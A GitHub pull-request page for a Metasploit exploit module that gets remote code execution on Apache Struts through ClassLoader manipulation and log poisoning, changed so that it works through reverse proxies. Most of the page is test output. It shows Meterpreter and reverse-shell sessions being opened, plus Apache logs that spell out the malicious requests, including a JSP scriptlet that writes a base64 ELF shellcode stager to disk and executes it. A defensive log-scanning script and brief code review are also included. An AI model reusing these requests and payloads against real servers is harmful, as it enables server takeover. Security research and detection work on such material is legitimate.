Change HTTP requests to succeed when going through HTTP proxies #4708

Merged
merged 1 commit into from Feb 4, 2015


julianvilas
Contributor

As @firefart said in #3314 (comment) (thanks buddy!), the way the payload is sent to the server in the HTTP request must be inside vars_get and not directly as uri to avoid problems when Reverse HTTP proxies are in use.

The changes in this PR are to make it happen :)

Testing env:

Test without apache proxy:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           8081                       yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] Started bind handler
[*] localhost:8081 - Modifying Class Loader...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] localhost:8081 - Generating JSP...
[*] localhost:8081 - Dumping JSP into the logfile...
[*] localhost:8081 - Waiting for the server to flush the logfile
[+] localhost:8081 - Log file flushed at http://localhost:8081/fVq1.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 1 opened (127.0.0.1:51820 -> 127.0.0.1:4444) at 2015-02-04 15:48:06 +0100
[+] Deleted fVq1.jsp
[+] Deleted untVZH

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

Test with apache mod_proxy_ajp:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting            Required  Description
   ----            ---------------            --------  -----------
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           localhost                  yes       The target address
   RPORT           80                         yes       The target port
   STRUTS_VERSION  2.x                        yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /hello_world/hello.action  yes       The path to a struts application action
   VHOST                                      no        HTTP server virtual host


Payload options (linux/x86/meterpreter/bind_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LPORT         4444             yes       The listen port
   RHOST         localhost        no        The target address


Exploit target:

   Id  Name
   --  ----
   1   Linux

msf exploit(struts_code_exec_classloader) > rexploit 
[*] Reloading module...

[*] localhost:80 - Modifying Class Loader...
[*] Started bind handler
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] localhost:80 - Generating JSP...
[*] localhost:80 - Dumping JSP into the logfile...
[*] localhost:80 - Waiting for the server to flush the logfile
[+] localhost:80 - Log file flushed at http://localhost:80/mhzu9704.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1236992 bytes) to localhost
[*] Meterpreter session 2 opened (127.0.0.1:38814 -> 127.0.0.1:4444) at 2015-02-04 15:49:55 +0100
[+] Deleted mhzu9704.jsp
[+] Deleted wCPy

meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0

Apache logs:

localhost - - [04/Feb/2015:15:49:32 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=webapps/ROOT&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=mhzu9&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=.jsp&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat=704 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:34 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:36 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:39 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:41 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.FileOutputStream\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"sun.misc.BASE64Decoder\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<%@ page import=\"java.io.File\" %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% FileOutputStream oFile = new FileOutputStream(\"wCPy\", false); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAijAAAA8gAAAAcAAAAAEAAAan1YmbIHuQAQAACJ42aB4wDwzYAx2/fjU0NTagKJ4bBmzYBbXlJoAgARXGoQUVCJ4WpmWM2A0eOwZs2AQ7BmiVEEzYCTtgywA82Aid//4Q==\")); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.flush(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% oFile.close(); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% File f = new File(\"wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% f.setExecutable(true); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% Runtime.getRuntime().exec(\"./wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:46 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:48 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:50 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 894 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 2063 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:52 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.prefix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
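For the defender reading those Apache logs, an added example (not part of this PR or of the Metasploit code base): a Python scan over access-log lines in the format quoted above, flagging the three request shapes the excerpt shows: the ClassLoader parameter manipulation, the JSP scriptlet sent as a query-string key, and the bare "?=" poll of the newly created .jsp. The sample lines are constructed, shortened copies of the ones above plus one benign request.

```python
import re
from urllib.parse import unquote
# Constructed sample lines in the format of the Apache access log quoted above:
# shortened copies of three of its requests plus one benign request (not captured traffic).
SAMPLE_LOG = r'''
localhost - - [04/Feb/2015:15:49:32 +0100] "GET /hello_world/hello.action?class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.directory=webapps/ROOT&class%5b%27classLoader%27%5d.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:34 +0100] "GET /mhzu9704.jsp?= HTTP/1.1" 200 198 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:49:43 +0100] "GET /gKD9D?<% Runtime.getRuntime().exec(\"./wCPy\"); %>= HTTP/1.1" 404 1190 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
localhost - - [04/Feb/2015:15:50:01 +0100] "GET /hello_world/hello.action?name=bob HTTP/1.1" 200 508 "-" "curl/7.38.0"
'''

# Combined log format; Apache escapes quotes inside the request target as \" (see line 3).
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>.*?) HTTP/\d\.\d" (?P<status>\d{3}) \S+')


def parse_line(line):
    """Split one access-log line into fields; None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"], _, query = rec["target"].partition("?")
    # Decode once so the percent-encoded class[...] form and the raw <% ... %> form are both visible.
    rec["query"] = unquote(query)
    return rec


def indicators(rec):
    """Name the suspicious traits of a parsed request; an empty list means none seen."""
    q, found = rec["query"], []
    # Parameter names that walk from the action into the ClassLoader (the log-redirect step).
    if re.search(r"class\[['\"]?classLoader['\"]?\]", q, re.IGNORECASE):
        found.append("struts-classloader-manipulation")
    # A JSP directive or scriptlet used as a query-string key, so the server logs it verbatim.
    if "<%" in q and "%>" in q:
        found.append("jsp-scriptlet-in-query")
    # Bare "?=" on a .jsp path: the empty key/value pair the module sends when polling the new log file.
    if rec["target"].endswith("?=") and rec["path"].endswith(".jsp"):
        found.append("bare-empty-param-probe")
    return found


def scan(text):
    """Return [(timestamp, path, [indicator, ...])] for every flagged line in text."""
    hits = []
    for line in text.strip().splitlines():
        rec = parse_line(line)
        tags = indicators(rec) if rec else []
        if tags:
            hits.append((rec["time"], rec["path"], tags))
    return hits
```

The three flagged lines together are the fingerprint of this module's traffic through a reverse proxy; the benign request with an ordinary parameter is not reported.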

@jvazquez-r7 jvazquez-r7 self-assigned this Feb 4, 2015
@jvazquez-r7 jvazquez-r7 merged commit de09559 into rapid7:master Feb 4, 2015
jvazquez-r7 added a commit that referenced this pull request Feb 4, 2015
Land #4708, @julianvilas's fix for struts_code_exec_classloader HTTP requests
@jvazquez-r7
Contributor

Makes sense to me. Test after changes:

msf exploit(struts_code_exec_classloader) > show options

Module options (exploit/multi/http/struts_code_exec_classloader):

   Name            Current Setting     Required  Description
   ----            ---------------     --------  -----------
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST           172.16.158.131      yes       The target address
   RPORT           8080                yes       The target port
   STRUTS_VERSION  2.x                 yes       Apache Struts Framework version (accepted: 1.x, 2.x)
   TARGETURI       /Example2/Login.do  yes       The path to a struts application action
   VHOST                               no        HTTP server virtual host


Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.158.1     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf exploit(struts_code_exec_classloader) > set STRUTS_VERSION 1.x
STRUTS_VERSION => 1.x
msf exploit(struts_code_exec_classloader) > rexploit
[*] Reloading module...

[*] Started reverse handler on 172.16.158.1:4444
[*] 172.16.158.131:8080 - Modifying Class Loader...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/bCXn500.jsp
[*] 172.16.158.131:8080 - Generating JSP...
[*] 172.16.158.131:8080 - Dumping JSP into the logfile...
[*] 172.16.158.131:8080 - Waiting for the server to flush the logfile
[*] 172.16.158.131:8080 - Countdown 10...
[*] 172.16.158.131:8080 - Countdown 9...
[*] 172.16.158.131:8080 - Countdown 8...
[*] 172.16.158.131:8080 - Countdown 7...
[*] Sending stage (36 bytes) to 172.16.158.131
[+] 172.16.158.131:8080 - Log file flushed at http://172.16.158.131:8080/bCXn500.jsp
[*] Command shell session 1 opened (172.16.158.1:4444 -> 172.16.158.131:37495) at 2015-02-04 09:47:16 -0600
[+] Deleted bCXn500.jsp
[+] Deleted OOx9

3657832983
VwsPTxaDavjNHimxNOXfYIfOxSRmbqxx
ShGrWmjBhVGGOFBeSFBAPxIClpYocGsk
tWhTFrqwKdLWmJDLEVHUzPgkvMSucNjV
id
uid=1000(juan) gid=1000(juan) groups=1000(juan),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
^C
Abort session 1? [y/N]  y

Thanks @firefart and @julianvilas !

@julianvilas julianvilas deleted the redsadic-strutsfix branch February 4, 2015 15:54
@firefart
Contributor

firefart commented Feb 4, 2015

woohoo thx!

'uri' => uri,
'encode_params' => false,
'vars_get' => {
cmd => ""
Contributor

This should be cmd => cmd?

Or drop the cmd argument from the function?

Contributor

it should result in /uri?my_command_to_execute so I think the syntax is correct, we don't need a value here

Contributor

So then cmd is redundant and should be removed for clarity?

Contributor

Ah no, I see that does make sense, it's just not very clear :)

Contributor

yeah, it's tricky to read
